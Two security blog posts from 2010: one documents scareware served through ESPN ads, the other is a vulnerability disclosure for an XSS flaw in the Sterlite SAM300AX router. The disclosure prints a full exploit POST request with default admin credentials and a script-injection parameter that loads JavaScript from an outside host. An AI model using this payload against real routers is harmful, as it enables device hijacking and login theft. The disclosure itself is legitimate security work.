Sunday, February 21, 2010

ESPN serving ads to scareware.


Going over ESPN online tonight, I came across this on 'http://games.espn.go.com/frontpage':



Considering this to be a one off random ad, I looked around the site. And these are few of several screens of what I found:




It became apparent these ads were present on majority of ESPN pages. It's your sponsored ad, I know ESPN, but what the heck!

I fired up Sandboxie and opened up this great PC fixer in my sandboxed browser.

 PC MightyMax home page greeted me with its great windows fixer

 I then downloaded what it offered and proceeded with installation.
 

 

 
As soon as installation completed, 2 processes were initiated - pcmm2010.exe and csc.exe.


And scary info popped up on my screen:

 



So my box needs to be fixed, as it says. Go ahead Max..


Moving forth with Buy option, a form appears asking for billing details, credit card information


Next screen needed my e-signature so I must give my date of birth; sure legit :P


Looking at page source during the transaction, it is seen some custom validation happens, I think, for confirming if the credit card, validity date, and cvv are hot or not.


Scroll down a bit and I see this:


After taking the credit card details and basically all PII necessary to make a transaction, a 'one-time' charge is deducted as well.

I've cleared off this mighty fixer from my sandbox. This rogue application - PC MightyMax 2010 - is an example of scareware. Scareware may also be utilized by spyware and / or malware.

From Wikipedia:

Scareware comprises several classes of scam software, often with limited or no benefit, sold to consumers via certain unethical marketing practices. The selling approach is designed to cause shock, anxiety, or the perception of a threat, generally directed at an unsuspecting user. Some forms of spyware and adware also use scareware tactics.

In this scenario, the scareware gained the trust of an unsuspecting user browsing through a trusted site - ESPN - and through strategic placement and frequency of its ad throughout the site, got downloaded and installed on user's box.

Upon getting installed, it followed its basic routine of fake scanning and presenting scary results to make user go to its rogue site and proceed with purchase.

If we look at the cost associated with the purchase, it is damn expensive - $29.95 for 14 days + additional one-time charge. Apart from these up front cost, a user is giving away a good share of his/her personally identifiable information as well as credit card details.

From the perspective of one sitting at other end and controlling the rogue application, every installation is in good probability generating commission - the economy behind scarewares.

The process is known for last few years but the quality of scareware marketing campaigns are evolving. 

In essence, ESPN is the primary entity responsible to facilitate fraud in this instance. ESPN's adspace revenue has clearly overlooked the crucial step of verifying the adspace buyers and the kind of ads running on espn.go.com.

Let's see for how long this remains unnoticed.

Best Regards.

Sunday, February 7, 2010

Sterlite SAM300AX ADSL router Cross Site Scripting (XSS)


Well, I reported XSS in Sterlite router on Feb 5, 2010.

Sterlite SAM300AX is used by broadband customers in Delhi and Mumbai, India. Given the customer base of MTNL in these 2 metro cities, this vulnerability may be extremely useful for an attacker and / or a bot herder looking for new bots.

After waiting for vendor response 2 weeks +, I decided to publish this to Full Disclosure/publicly.


Sharing the vuln POST request and parameters here:

POST Request
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101
POST Parameters
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

Screenshots
 

 

Impact
Remote script / code execution, login theft n other nasty things.
##########
Vulnerability Found: January 19, 2010 
Vendor First Notified: January 20, 2010 
Vendor Response: None 
Follow Up Notification: January 27, 2010 
Vendor Response: None 
Public Disclosure: February 05, 2010 
##########

You can read the full details here:
http://secunia.com/advisories/38463/

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.